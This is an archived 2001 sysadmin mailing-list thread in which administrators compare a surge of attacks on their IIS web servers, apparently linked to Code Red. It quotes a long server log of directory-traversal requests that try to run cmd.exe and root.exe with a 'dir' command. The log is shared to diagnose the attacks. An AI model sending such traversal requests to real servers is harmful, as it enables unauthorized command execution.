Re: WARNING: Hacker Alert

Kelly Borndale Tue, 18 Sep 2001 10:04:49 -0700

Did you apply the rollup fix, or just the code red fix?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
K.Borndale

[EMAIL PROTECTED] -home email
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

----- Original Message -----

From: Luke Brumbaugh

To: NT System Admin Issues

Sent: Tuesday, September 18, 2001 12:38 PM

Subject: RE: WARNING: Hacker Alert

If you have updated for Code Red, do we need to do anything?

-----Original Message-----
From: Marr, Chris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:22 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

Usama Bin ........................

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:52 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

Why do people gotta do this shit now? damn...!

> -----Original Message-----
> From: Jason Morris [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 15:59
> To: NT System Admin Issues
> Subject: RE: WARNING: Hacker Alert
>
>
> CodeRed seems to have dwindled to nothing on my logs. But it's being
> replaced with the EXACT same lines you have below, and they
> stay consistent
> with the code red 2 methods of attacking the more local subnets.
>
> Jason Morris CCDA CCNP
> Network Administrator
> MJMC, Inc.
> 708-225-2350
> [EMAIL PROTECTED]
>
>
> -----Original Message-----
> From: Jason Morris [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 9:50 AM
> To: NT System Admin Issues
> Cc: '[EMAIL PROTECTED]'
> Subject: RE: WARNING: Hacker Alert
>
>
> Yes. It seems to be systems I have previously monitored
> hitting me with
> codered attacks. I bet someone is activating all of their children.
>
> Jason Morris CCDA CCNP
> Network Administrator
> MJMC, Inc.
> 708-225-2350
> [EMAIL PROTECTED]
>
>
> -----Original Message-----
> From: xylog [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 9:45 AM
> To: NT System Admin Issues
> Subject: WARNING: Hacker Alert
>
>
> All my public facing web servers at home and at my office have shown a
> huge continuous hacking activity. Has anyone seen similar? I fear this
> may be code red related or automated. Please comment if you have seen
> similar. Here is an excerpt from one logfile:
>
> 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 145,
> 0, 500, 87, GET,
> /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system
> 32/cmd.exe
> , /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
> 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
> 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
> 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
> 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 100,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
> 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156,
> 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 72,
> 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 70,
> 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 80,
> 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15,
> 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 96,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
> 117, 0, 500, 87, GET,
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
> 117, 0, 500, 87, GET,
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
> 145, 0, 500, 87, GET,
> /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system
> 32/cmd.exe
> , /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15,
> 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156,
> 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
> 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
> 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 97,
> 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 98,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 96,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0,
> 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 96,
> 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 72,
> 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 70,
> 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 80,
> 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 80,
> 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 96,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 117,
> 0, 500, 87, GET,
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 117,
> 0, 500, 87, GET,
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 145,
> 0, 500, 87, GET,
> /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system
> 32/cmd.exe
> , /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 72,
> 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 70,
> 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 80,
> 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 80,
> 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 96,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 117,
> 0, 500, 87, GET,
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 117,
> 0, 500, 87, GET,
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 145,
> 0, 500, 87, GET,
> /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system
> 32/cmd.exe
> , /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
> x.x.x.x, 15, 97,
> 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01,
> x.x.x.x, 16, 97,
> 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01,
> x.x.x.x, 15, 97,
> 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 97,
> 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 98,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172,
> 41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 96,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 100,
> 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01,
> x.x.x.x, 0, 96,
> 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
>
>
>
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> Confidential: This e-mail and any files transmitted with it are the
> property of Lanco International and/or its affiliates, are
> confidential, and
> are intended solely for the use of the individual or entity
> to whom this
> e-mail is addressed. If you are not one of the named recipient(s) or
> otherwise have reason to believe that you have received this
> message in
> error, please notify the sender at the above e-mail address
> and delete this
> message immediately from your computer. Any other use, retention,
> dissemination, forwarding, printing or copying of this e-mail
> is strictly
> prohibited.
>
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> Confidential: This e-mail and any files transmitted with it are the
> property of Lanco International and/or its affiliates, are
> confidential, and
> are intended solely for the use of the individual or entity
> to whom this
> e-mail is addressed. If you are not one of the named recipient(s) or
> otherwise have reason to believe that you have received this
> message in
> error, please notify the sender at the above e-mail address
> and delete this
> message immediately from your computer. Any other use, retention,
> dissemination, forwarding, printing or copying of this e-mail
> is strictly
> prohibited.
>
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
>

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Enterprise Channel Management Software for Manufacturers
Visit us at http://www.ultryx.com

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Re: WARNING: Hacker Alert

Reply via email to